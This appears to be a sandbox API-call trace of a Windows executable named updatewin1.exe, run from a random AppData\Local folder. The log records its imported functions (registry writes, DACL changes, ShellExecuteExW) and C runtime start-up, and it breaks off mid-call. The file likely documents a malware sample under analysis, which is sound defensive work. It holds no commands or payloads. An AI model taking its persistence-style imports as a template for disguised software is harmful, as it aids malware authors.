0x77c794a4 [0129.294] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0129.294] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0129.294] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0129.294] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0129.294] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0129.295] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0129.295] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.295] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0129.295] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0129.295] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0129.296] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0129.296] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0129.296] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0129.296] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0129.296] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0129.296] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0129.296] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0129.297] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0129.298] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0129.298] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0129.298] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0129.298] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0129.298] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0129.298] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0129.298] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0129.298] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0129.299] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0129.299] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0129.299] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0129.299] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.299] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0129.299] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0129.299] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0129.300] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0129.300] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0129.300] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0129.390] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0129.391] atexit (param_1=0x2b63d8) returned 0 [0129.447] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0x577c8e50, dwHighDateTime=0x1d6bf06)) [0129.447] GetCurrentThreadId () returned 0x24c [0129.447] GetCurrentProcessId () returned 0xab0 [0129.448] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=24971234909) returned 1 [0129.449] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.450] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.451] GetLastError () returned 0x57 [0129.452] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.452] GetLastError () returned 0x57 [0129.452] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0129.452] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0129.452] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.452] GetLastError () returned 0x57 [0129.453] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0129.453] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0129.542] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.543] GetLastError () returned 0x57 [0129.543] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.543] GetLastError () returned 0x57 [0129.543] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0129.543] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0129.544] GetProcessHeap () returned 0x2a0000 [0129.544] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.544] GetLastError () returned 0x57 [0129.544] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0129.544] GetLastError () returned 0x57 [0129.544] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0129.544] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x364) returned 0x2ca9e8 [0129.544] SetLastError (dwErrCode=0x57) [0129.546] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xc00) returned 0x2cad58 [0129.548] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x869552de, hStdError=0xfffffffe)) [0129.548] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.548] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0129.548] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.548] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" " [0129.549] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe\" " [0129.549] IsValidCodePage (CodePage=0x4e4) returned 1 [0129.549] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0129.549] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0129.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.549] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.549] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0129.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0129.551] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.551] GetLastError () returned 0x57 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0129.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0129.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0129.551] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x06÷Ì\x86Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.551] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0129.551] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0129.551] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x06÷Ì\x86Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x80) returned 0x2ca0d0 [0129.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\68fff198-b032-4cc5-9a68-f439953f0783\\updatewin1.exe")) returned 0x5f [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xc8) returned 0x2cc160 [0129.552] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0129.552] GetLastError () returned 0x0 [0129.552] GetEnvironmentStringsW () returned 0x2cc230* [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xaca) returned 0x2ccd08 [0129.552] FreeEnvironmentStringsW (penv=0x2cc230) returned 1 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x98) returned 0x2cc230 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3e) returned 0x2cd7f8 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x6c) returned 0x2cc2d0 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x6e) returned 0x2cc348 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x78) returned 0x2b1180 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x62) returned 0x2cc3c0 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2b52d0 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x48) returned 0x2cc430 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x28) returned 0x2ca158 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1a) returned 0x2cbd10 [0129.552] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x4a) returned 0x2cc480 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x72) returned 0x2b1200 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2b5308 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x2e) returned 0x2b5340 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x1c) returned 0x2cbd38 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xd2) returned 0x2cc4d8 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x7c) returned 0x2cc5b8 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x36) returned 0x2cc640 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x3a) returned 0x2cd840 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x90) returned 0x2cc680 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x24) returned 0x2cc718 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x30) returned 0x2b5378 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x36) returned 0x2cc748 [0129.566] RtlAllocateHeap (HeapHandle=0x2a0000, 